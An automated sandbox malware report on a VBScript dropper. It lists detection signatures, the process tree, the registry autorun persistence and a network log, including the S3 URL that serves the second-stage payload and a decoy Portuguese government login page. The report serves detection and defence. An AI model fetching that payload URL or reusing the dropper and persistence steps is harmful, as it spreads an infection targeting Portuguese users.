Windows Analysis Report
guia_luqf.vbs

Overview

General Information

Sample name: guia_luqf.vbs
Analysis ID: 1555843
MD5: 3163a6526f07d203061a91ff6e7236c7
SHA1: 4561ad4c5e704553b187f6e49218f234a50f157d
SHA256: 0799f38e9829f8d7c0926dcf77dc1e1ecb959e209edb9a7320e6bfd331d7e0ad

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
Creates multiple autostart registry keys
May use the Tor software to hide its network traffic
Sigma detected: Execution from Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 5332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • chrome.exe (PID: 4280 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • artigo.exe (PID: 7892 cmdline: "C:\users\public\Termos\artigo.exe" MD5: 31DF1F6E455D2A740E1A90E413F9DB68)
      • place.exe (PID: 8128 cmdline: c:\Intrumental\place.exe MD5: 971CB0CF2672A22241854896998DDE20)
      • lspcv2.exe (PID: 4020 cmdline: c:\Intrumental\lspcv2.exe MD5: 2047B6AC02B7C454F61D7E90EE1608FE)
  • place.exe (PID: 7544 cmdline: "C:\Intrumental\place.exe" MD5: 971CB0CF2672A22241854896998DDE20)
  • lspcv2.exe (PID: 7912 cmdline: "C:\Intrumental\lspcv2.exe" MD5: 2047B6AC02B7C454F61D7E90EE1608FE)
  • place.exe (PID: 5316 cmdline: "C:\Intrumental\place.exe" MD5: 971CB0CF2672A22241854896998DDE20)
  • lspcv2.exe (PID: 3220 cmdline: "C:\Intrumental\lspcv2.exe" MD5: 2047B6AC02B7C454F61D7E90EE1608FE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\users\public\Termos\artigo.exe" , CommandLine: "C:\users\public\Termos\artigo.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Termos\artigo.exe, NewProcessName: C:\Users\Public\Termos\artigo.exe, OriginalFileName: C:\Users\Public\Termos\artigo.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5332, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\users\public\Termos\artigo.exe" , ProcessId: 7892, ProcessName: artigo.exe
Source: Network Connection Author: frack113, Florian Roth: Data: DestinationIp: 16.12.9.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5332, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Network Connection Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 16.12.9.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Termos\artigo.exe, Initiated: true, ProcessId: 7892, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49788
Source: Process started Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", ProcessId: 5332, ProcessName: wscript.exe
Source: File created Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5332, TargetFilename: C:\Users\Public\Termos.zip
Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\Intrumental\place.exe, EventID: 13, EventType: SetValue, Image: C:\Intrumental\place.exe, ProcessId: 8128, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Iplace
Source: Network Connection Author: frack113: Data: DestinationIp: 16.12.9.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5332, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs", ProcessId: 5332, ProcessName: wscript.exe
No Suricata rule has matched

Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP Parser: Title: acesso.gov.pt does not match URL
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP Parser: <input type="password" .../> found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP Parser: No <meta name="author".. found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 16.12.9.14:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:50244 version: TLS 1.2

Networking

Source: C:\Windows\System32\wscript.exe Network Connect: 16.12.9.14 443
Source: Joe Sandbox View IP Address: 92.53.116.138
Source: Joe Sandbox View IP Address: 94.241.141.101
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 94.241.141.101
Source: global traffic HTTP traffic detected:
  GET /preferencia.cdr HTTP/1.1
  Accept: */*
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com
  Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /v2/loginForm?partID=PFAP&path=/geral/dashboard HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/css/styles.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/css/sa-custom.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/css/tabs.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/pf/css/pf-main.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/css/bootstrap.min.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/pf/css/footer.css?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1Host: static.portaldasfinancas.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/img/autenticacaogov.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /app/pfstatic_static/js/pf-footer.js HTTP/1.1Host: static.portaldasfinancas.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/img/background.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
Source: global trafficHTTP traffic detected: GET /autentica_static/img/logo-at.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
